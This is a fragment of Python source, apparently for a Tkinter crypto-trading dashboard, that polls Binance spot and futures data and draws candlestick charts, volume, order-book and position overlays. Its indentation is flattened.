app.graph_2.delete("all")
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist5[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="pink",width=grSt)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/prSt)* grSt
pp=(x1,y1)
points.append(pp)
app.graph_2.create_line(points,fill="lightgreen",width=grSt)
class Timer_Candle:
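    # Worker loop for the candle chart: while running, fetches klines for the selected
    # symbol and interval (plus BTCUSDT for reference) and redraws the candle-chart canvases.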
def __init__(self):
#global ss
global TE_Cnd
global yI
global Lo
global PEP
global PSP
global PPP
global y0I_TP
global GPPP_Tmp
global GPSP_Tmp
global grMd
global grSt
global grFt
global GOS_TP
global GOS_SL
grFt_12 = font.Font(size=12)
grFt_10 = font.Font(size=10)
while True:
if PS1 == True:
                sys_msg = ' Candle chart ' + grSmb + ' stopped.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = True
break
if should_run_C:
for i in range(400):
if not should_run_C:
                        sys_msg = ' Candle chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_C:
if i==0:
                            sys_msg = ' Candle chart ' + grSmb + ' started.'
app.Sys_Msg(text1=sys_msg)
TE_Cnd = False
if i > 0:
time.sleep(0.5)
if MS=='SPOT':
myTup11 = ('depth', bot.depth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
elif MS=='FUTURES':
myTup11 = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=10)) #tupl (IF LIMIT<=50 THEN WEIGHT = 2)
mylist3 = myTup11[1] #dict
mylist4=mylist3['bids'] #list
mylist5=mylist3['asks'] #list
if i==0:
app.Scale_TP.set(0)
app.Scale_SL.set(0)
#print(myTup11[1])
if MS=='SPOT' and i==0:
if GS=='CANDLE 5m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='5m', limit=288))
elif GS=='CANDLE 1m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1m', limit=288))
elif GS=='CANDLE 15m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='15m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='15m', limit=288))
elif GS=='CANDLE 30m':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='30m', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='30m', limit=288))
elif GS=='CANDLE 1h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1h', limit=288))
elif GS=='CANDLE 4h':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='4h', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='4h', limit=288))
elif GS=='CANDLE 1d':
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='1d', limit=288)) #Tupl
myTupBTCD =('klines', bot.klines(symbol='BTCUSDT', interval='1d', limit=288))
myDicGr1 = myTupSpK[1] #dict
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
#print (myDicGr1[1][1])
elif MS=='FUTURES' and i==0:
if GS=='CANDLE 5m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='5m', limit=288)) #tupl
elif GS=='CANDLE 1m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1m', limit=288)) #tupl
elif GS=='CANDLE 15m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='15m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='15m', limit=288)) #tupl
elif GS=='CANDLE 30m':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='30m', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='30m', limit=288)) #tupl
elif GS=='CANDLE 1h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1h', limit=288)) #tupl
elif GS=='CANDLE 4h':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='4h', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='4h', limit=288)) #tupl
elif GS=='CANDLE 1d':
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='1d', limit=288)) #tupl
myTupBTCD = ('futuresKlines', bot.futuresKlines(symbol='BTCUSDT', interval='1d', limit=288)) #tupl
my_file_Kl = open(grSmb + "_KL.txt", "w")
my_file_Kl.write(str(myTupFtK))
my_file_Kl.close()
#print(myTup12)
myDicGr1 = myTupFtK[1]
myDicBTCD = myTupBTCD[1]
#print(myDicGr1)
yI0=float(myDicGr1[287][1])
y0I_TP = yI0
if i==0:
PnL_Pos_L = ''
PnL_Pos_S = ''
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
PnL_Pos = 0
app.graph_Cn.delete("all")
app.graph_VV.delete("all")
app.graph_BTCD.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
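                        # grMd is the vertical centre of the canvas; grSt is the vertical zoom factor derived from the
                        # tick size (prSt) and the zoom setting (grZm). With the (prSt*10) divisor used in the plotting
                        # formulas below, a 1% move from the reference price yI0 maps to roughly grZm/10 pixels.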
#print(grZm)
#print (grMd)
TT0 = time.mktime(time.localtime())*1000
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
GAP = app.graph_Cn.create_line(points,fill="blue",width=1,dash=(4,2))
if MS == 'FUTURES':
GPEP_L = app.graph_Cn.create_line((0,0,0,0),fill="#336633",width=1,dash=(20,10))
GPEP_S = app.graph_Cn.create_line((0,0,0,0),fill="black",width=1,dash=(20,10))
GPLP = app.graph_Cn.create_line((0,0,0,0),fill="orange",width=3,dash=(20,10))
GPSP = app.graph_Cn.create_line((0,0,0,0),fill="red",width=3,dash=(20,10))
GPPP = app.graph_Cn.create_line((0,0,0,0),fill="green",width=3,dash=(20,10))
GPPP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#66CDAA",width=1,dash=(50,50))
GPSP_Tmp = app.graph_Cn.create_line((0,0,0,0),fill="#DC143C",width=1,dash=(50,50))
GEPt = app.graph_Cn.create_text(0,0,text='',fill="black",font=grFt_12)
GOS_TP = app.graph_Cn.create_rectangle((0,0,0,0),fill="#66CDAA")
GOS_SL = app.graph_Cn.create_rectangle((0,0,0,0),fill="pink")
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue",font=grFt_10)
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue",font=grFt_10)
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue",font=grFt_10)
elif prSt < 0.0001:
app.graph_Cn.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAPt = app.graph_Cn.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue",font=grFt_10)
yp=1180
ypi=0
while yp > -500:
points=[]
if GS=='CANDLE 5m':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1m':
yp_s = 10*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 15m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 30m':
yp_s = 8*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 4h':
yp_s = 12*4
yp = 1180 - ypi*yp_s
elif GS=='CANDLE 1d':
yp_s = 14*4
yp = 1180 - ypi*yp_s
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
if GS=='CANDLE 5m':
tm=TT0/1000+36000-ypi*3600
elif GS=='CANDLE 1m':
tm=TT0/1000+7200-ypi*600
elif GS=='CANDLE 15m':
tm=TT0/1000+108000-ypi*7200
elif GS=='CANDLE 30m':
tm=TT0/1000+216000-ypi*14400
elif GS=='CANDLE 1h':
tm=TT0/1000+432000-ypi*43200
elif GS=='CANDLE 4h':
tm=TT0/1000+1728000-ypi*172800
elif GS=='CANDLE 1d':
tm=TT0/1000+10368000-ypi*1209600
tm1 = datetime.datetime.fromtimestamp(tm)
                            if GS=='CANDLE 1m' or GS=='CANDLE 5m' or GS == 'CANDLE 15m' or GS == 'CANDLE 30m' or GS == 'CANDLE 1h':
tmm=tm1.strftime("%H:%M")
elif GS == 'CANDLE 4h' or GS == 'CANDLE 1d':
tmm=tm1.strftime("%d.%m")
app.graph_Tb.create_text(1180 - ypi*yp_s,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*yp_s,10,text=tmm)
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
yp=grMd
if grZm <= 100:
ypi = 10
else:
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Cn.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Cn.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
if grZm <= 100:
ypi += 10
else:
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1)):
myDicGr1TT = myDicGr1[mm]
myDicGr1BTCD = myDicBTCD[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
if GS=='CANDLE 5m':
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*4
elif GS=='CANDLE 1m':
xxp = 700 + ((((xx - TT0)/1000)+30)/60)*4
elif GS=='CANDLE 15m':
xxp = 700 + ((((xx - TT0)/1000)+450)/900)*4
elif GS=='CANDLE 30m':
xxp = 700 + ((((xx - TT0)/1000)+900)/1800)*4
elif GS=='CANDLE 1h':
xxp = 700 + ((((xx - TT0)/1000)+1800)/3600)*4
elif GS=='CANDLE 4h':
xxp = 700 + ((((xx - TT0)/1000)+7200)/14400)*4
elif GS=='CANDLE 1d':
xxp = 700 + ((((xx - TT0)/1000)+43200)/86400)*4
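                        # Map each candle's open time to an x coordinate: one candle occupies 4 px and the current
                        # time (TT0) is anchored near x = 700, so older candles extend to the left of that point.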
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
yyp2 = grMd - ((float(myDicGr1TT[3])-yI0)/(prSt*10))* grSt # MinPrice
yyp3 = grMd - ((float(myDicGr1TT[1])-yI0)/(prSt*10))* grSt #Open Price
yyp4 = grMd - ((float(myDicGr1TT[4])-yI0)/(prSt*10))* grSt #Close Price
if mm == 0:
yypVMax = 0
yypTMax = 0
for nm in range(len(myDicGr1)):
if float(myDicGr1[nm][5])>yypVMax:
#print(myDicGr1[nm][5])
yypVMax = float(myDicGr1[nm][5])
if float(myDicGr1[nm][8])>yypTMax:
#print(myDicGr1[nm][5])
yypTMax = float(myDicGr1[nm][8])
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
app.graph_BTCD.create_line(-100,50,1000,50,fill='black',dash=(1,1))
else:
yyp5 = 100-((float(myDicGr1TT[5])/yypVMax))*100
yyp6 = ((float(myDicGr1TT[8])/yypTMax))*100
if float(myDicGr1BTCD[1]) < float(myDicGr1BTCD[4]):
app.graph_BTCD.create_line(xxp,50,xxp,50-((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='green')
else:
app.graph_BTCD.create_line(xxp,50,xxp,50+((float(myDicGr1BTCD[2])-float(myDicGr1BTCD[3]))/(float(myDicGr1BTCD[3])/100))*20,fill='red')
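                        # graph_VV shows per-candle volume (coloured by candle direction, scaled to the busiest candle)
                        # and taker-buy volume (black); graph_BTCD shows each BTC/USDT candle's high-low range in
                        # percent, drawn upward in green for up candles and downward in red for down candles.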
if xxp > 1000:
app.graph_Cn.configure(scrollregion=(-500,-500,xxp+100,1000))
app.graph_Tb.configure(scrollregion=(-500,0,xxp+100,70))
app.graph_Td.configure(scrollregion=(-500,0,xxp+100,70))
#print (grMd, ' - ', yyp)
if float(myDicGr1TT[1])<float(myDicGr1TT[4]):
flc = "green"
else:
flc="red"
app.graph_Cn.create_line(xxp, yyp1, xxp, yyp2, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp3, xxp+1, yyp3, fill=flc)
app.graph_Cn.create_line(xxp-1, yyp4, xxp+1, yyp4, fill=flc)
app.graph_VV.create_line(xxp,100,xxp,yyp5,fill=flc)
app.graph_VV.create_line(xxp+1,0,xxp+1,yyp6,fill='black')
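                    # FUTURES only: overlay the open position data on the chart - entry and liquidation prices -
                    # plus any working STOP_MARKET, TAKE_PROFIT_MARKET and LIMIT orders for this symbol.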
if MS == 'FUTURES':
BnFAcc=bot.userPositionInfo()
if len(BnFAcc)>0: #and i==0:
sTmp=''
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
#print(BnFAcc1)
if str(BnFAcc1['symbol'])==grSmb and float(BnFAcc1['positionAmt']) != 0:
y_liq = float(BnFAcc1['liquidationPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPLP, -500,y_liq,800,y_liq)
y_liq = float(BnFAcc1['entryPrice'])
PEP=float(BnFAcc1['entryPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
#print (BnFAcc1['positionSide'])
if str(BnFAcc1['positionSide'])=='LONG':
app.graph_Cn.coords(GPEP_L, -500,y_liq,800,y_liq)
PnL_Pos_L = BnFAcc1['unRealizedProfit']
if str(BnFAcc1['positionSide'])=='SHORT':
#print (BnFAcc1['positionSide'])
app.graph_Cn.coords(GPEP_S, -500,y_liq,800,y_liq)
PnL_Pos_S = BnFAcc1['unRealizedProfit']
app.graph_Cn.coords(GEPt, 105, y_liq)
app.graph_Cn.itemconfigure(GEPt,text=str(BnFAcc1['positionSide']) + ' Price: '+ str(float(BnFAcc1['entryPrice']))+'\n'+'Amt: ' + str(float(BnFAcc1['positionAmt'])*float(BnFAcc1['entryPrice']))+ ' USDT')
BnFAcc=bot.userOpenOrders(symbol=grSmb)
if len(BnFAcc)>0:
for mm in range (len(BnFAcc)):
BnFAcc1 = BnFAcc[mm]
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='STOP_MARKET' and str(BnFAcc1['type'])=='STOP_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPSP, -500,y_liq,800,y_liq)
PSP = float(BnFAcc1['stopPrice'])
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_SL.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_TP.set (-float((100-(float(PSP)/float(PEP))*100)*float(Lvrg)))
if y_liq > 1000:
Ltmp = app.graph_Cn.configure()
#print(Ltmp['scrollregion'][4])
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],Ltmp1[1],Ltmp1[2],y_liq+200))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='TAKE_PROFIT_MARKET' and str(BnFAcc1['type'])=='TAKE_PROFIT_MARKET':
y_liq = float(BnFAcc1['stopPrice'])
PPP=y_liq
if PosSide == 'LONG' and str(BnFAcc1['positionSide'])== 'LONG' and i==0:
app.Scale_TP.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
if PosSide == 'SHORT' and str(BnFAcc1['positionSide'])== 'SHORT' and i==0:
app.Scale_SL.set (-float((100-(float(y_liq)/float(PEP))*100)*float(Lvrg)))
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt # LiqPrice
app.graph_Cn.coords(GPPP, -500,y_liq,800,y_liq)
if y_liq < -500:
Ltmp = app.graph_Cn.configure()
Ltmp1=Ltmp['scrollregion'][4].split()
#print(Ltmp1)
app.graph_Cn.configure(scrollregion=(Ltmp1[0],y_liq-200,Ltmp1[2],Ltmp1[3]))
if str(BnFAcc1['symbol'])==grSmb and str(BnFAcc1['origType'])=='LIMIT' and str(BnFAcc1['type'])=='LIMIT' and i==0:
#print(BnFAcc1)
y_liq = float(BnFAcc1['price'])
if str(BnFAcc1['positionSide'])== 'LONG':
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.create_line(800,y_liq,900,y_liq,fill="#336633",width=1)
app.graph_Cn.create_text(800,y_liq,text='Order LONG\n'+str(BnFAcc1['price']) ,fill="#336633")
if str(BnFAcc1['positionSide'])== 'SHORT':
y_liq = grMd - ((y_liq-yI0)/(prSt*10))* grSt
app.graph_Cn.create_line(800,y_liq,900,y_liq,fill="#DC143C",width=1)
app.graph_Cn.create_text(800,y_liq,text='Order SHORT\n'+str(BnFAcc1['price']) ,fill="#DC143C")
#Order Book Graph
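                    # The depth levels are collected here, but only the best bid (m == 0) is actually used: it moves
                    # the blue current-price line (GAP) and rebuilds the price/PnL label (GAPt) next to it.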
for m in range (int(len(mylist5))):
if float(mylist5[m][1])>0:
points=[]
x0 = 180
y0 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist5[m][1])/(grOW/100))*10
y1 = grMd - ((float(mylist5[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if float(mylist4[m][1])>0:
points=[]
x0 = 180
#y0 = grMd + grSt/2 - ((float(mylist4[m][0])-yI0)/prSt)* grSt
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
#print('-', yI0, ' - ', float(mylist4[m][0]))
pp=(x0,y0)
points.append(pp)
x1 = 180 - (float(mylist4[m][1])/(grOW/100))*10
#print(float(mylist4[m][1]))
y1 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* (grSt/10)
pp=(x1,y1)
points.append(pp)
if m==0:
y0 = grMd - ((float(mylist4[m][0])-yI0)/(prSt*10))* grSt
#print(mylist4[m][0],x0, y0, x1, y1)
app.graph_Cn.coords(GAP, -500, y0, 800, y0)
app.graph_Cn.coords(GAPt, 805, y0)
if len(PnL_Pos_L) > 0 and len(PnL_Pos_S) > 0:
sTmp = '\n' + 'Price: ' + str(float(mylist4[m][0]))
else:
sTmp = 'Price: ' + str(float(mylist4[m][0]))
if len(PnL_Pos_L) > 0:
sTmp += '\n'+'Long PnL: ' + str(PnL_Pos_L)
if len(PnL_Pos_S) > 0:
sTmp += '\n'+'Short PnL: ' + str(PnL_Pos_S)
app.graph_Cn.itemconfigure(GAPt,text=sTmp)
class Timer_Candle_Summ:
def __init__(self):
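        # Polls SPOT and FUTURES data for grSmb roughly every 0.5 s and redraws graph_Sm with both 5m candle
        # series overlaid (SPOT in green/red, FUTURES in black), plus the futures order book on graph_2,
        # so the two markets can be compared side by side.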
global TE_CndSm
global ss
global yI
global Lo
while True:
if PS1 == True:
                sys_msg = ' SPOT/FUTURES comparison candlestick chart ' + grSmb + ' stopped.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = True
break
if should_run_S:
for i in range(400):
if not should_run_S:
                        sys_msg = ' SPOT/FUTURES comparison candlestick chart ' + grSmb + ' will be stopped.'
app.Sys_Msg(text1=sys_msg)
break
if should_run_S:
if i==0:
                            sys_msg = ' SPOT/FUTURES comparison candlestick chart ' + grSmb + ' started.'
app.Sys_Msg(text1=sys_msg)
TE_CndSm = False
if i > 0:
time.sleep(0.5)
myTup_DSp = ('depth', bot.depth(symbol=grSmb, limit=50)) #tupl
mylist3_Sp = myTup_DSp[1] #dict
mylist4_Sp=mylist3_Sp['bids'] #list
mylist5_Sp=mylist3_Sp['asks'] #list
myTup_DFt = ('FutDepth', bot.futuresDepth(symbol=grSmb, limit=500)) #tupl
mylist3_Ft = myTup_DFt[1] #dict
mylist4_Ft=mylist3_Ft['bids'] #list
mylist5_Ft=mylist3_Ft['asks'] #list
#print(myTup11[1])
#print('trades', bot.trades(symbol='BNBUSDT', limit=1))
                            #If one trader bought and another sold, is that a buy or a sell?
                            #In the Binance trade history, trades with isBuyerMaker == false are highlighted in green,
                            #and those with isBuyerMaker == true in magenta.
                            #sss41 = "BNBUSDT - trades"
myTupSpK =('klines', bot.klines(symbol=grSmb, interval='5m', limit=288)) #Tupl
#print (myTup131[1])
myDicGr1Sp = myTupSpK[1] #dict
#print(myDicGr1)
yI0=float(myDicGr1Sp[287][1])
#print (myDicGr1[1][1])
myTupFtK = ('futuresKlines', bot.futuresKlines(symbol=grSmb, interval='5m', limit=288)) #tupl
#print(myTup12)
myDicGr1Ft = myTupFtK[1]
#print(myDicGr1)
yI0=float(myDicGr1Ft[287][1])
#print (yI0)
if i==0:
BnMt = bot.futuresOrders(limit=1)
#print (BnMt)
Lo = int(BnMt[0]['orderId'])
#print (Lo)
yI=100
app.graph_Sm.delete("all")
app.graph_Tb.delete("all")
app.graph_Td.delete("all")
grMd = grH/2
grSt = grZm/(yI0*0.01/prSt)
TT0 = time.mktime(time.localtime())*1000
ss = ""
points=[]
pp=(-500,grMd)
points.append(pp)
pp=(900,grMd)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
GAP_Sp = app.graph_Sm.create_line(points,fill="blue",width=1,dash=(4,2))
#print(yI0,grMd,prSt)
if prSt >= 0.1:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.2f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.2f" % (yI0),fill="blue")
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.3f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.3f" % (yI0),fill="blue")
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.4f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.4f" % (yI0),fill="blue")
elif prSt < 0.0001:
app.graph_Sm.create_text(900,grMd + 0*grSt/2,text="%.8f" % (yI0))
GAP_SpT = app.graph_Sm.create_text(800,grMd + 0*grSt/2,text="%.8f" % (yI0),fill="blue")
yp=1180
ypi=0
while yp > -500:
points=[]
yp = 1180 - ypi*12*4#12*4=1hour
#print(yp)
pp = (yp,-500)
points.append(pp)
pp = (yp,1500)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1,dash=(4,2))
app.graph_Tb.create_line((yp,0,yp,70),fill="gray",width=1)
app.graph_Td.create_line((yp,0,yp,70),fill="gray",width=1)
tm=TT0/1000+36000-ypi*3600
tm1 = datetime.datetime.fromtimestamp(tm)
tmm=tm1.strftime("%H:%M")
app.graph_Tb.create_text(1180 - ypi*48,10,text=tmm)
app.graph_Td.create_text(1180 - ypi*48,10,text=tmm)
ypi += 1
yp=grMd
ypi=1
while yp < 1500:
points=[]
yp=grMd +ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp) #400 == 0.25%
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0-ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0-ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0-ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0-ypi*(yI0/100)))
ypi += 1
yp=grMd
ypi=1
while yp > -1000:
points=[]
yp=grMd - ypi*((yI0/100)/(prSt*10))*grSt
pp=(-500,yp)
points.append(pp)
pp=(1500,yp)
points.append(pp)
app.graph_Sm.create_line(points,fill="gray",width=1)
if prSt >= 0.1:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.1 > prSt >= 0.01:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.2f" % (yI0+ypi*(yI0/100)))
elif 0.01 > prSt >= 0.001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.3f" % (yI0+ypi*(yI0/100)))
elif 0.001 > prSt >= 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.4f" % (yI0+ypi*(yI0/100)))
elif prSt < 0.0001:
app.graph_Sm.create_text(900,yp + 0*grSt/2,text="%.8f" % (yI0+ypi*(yI0/100)))
ypi += 1
#print (len(myDicGr1))
for mm in range(len(myDicGr1Sp)):
myDicGr1TT = myDicGr1Sp[mm]
#print (myDicGr1TT)
xx=myDicGr1TT[0]
# print (xx)
xxp = 700 + ((((xx - TT0)/1000)+150)/300)*8
yyp1 = grMd - ((float(myDicGr1TT[2])-yI0)/(prSt*10))* grSt # MaxPrice
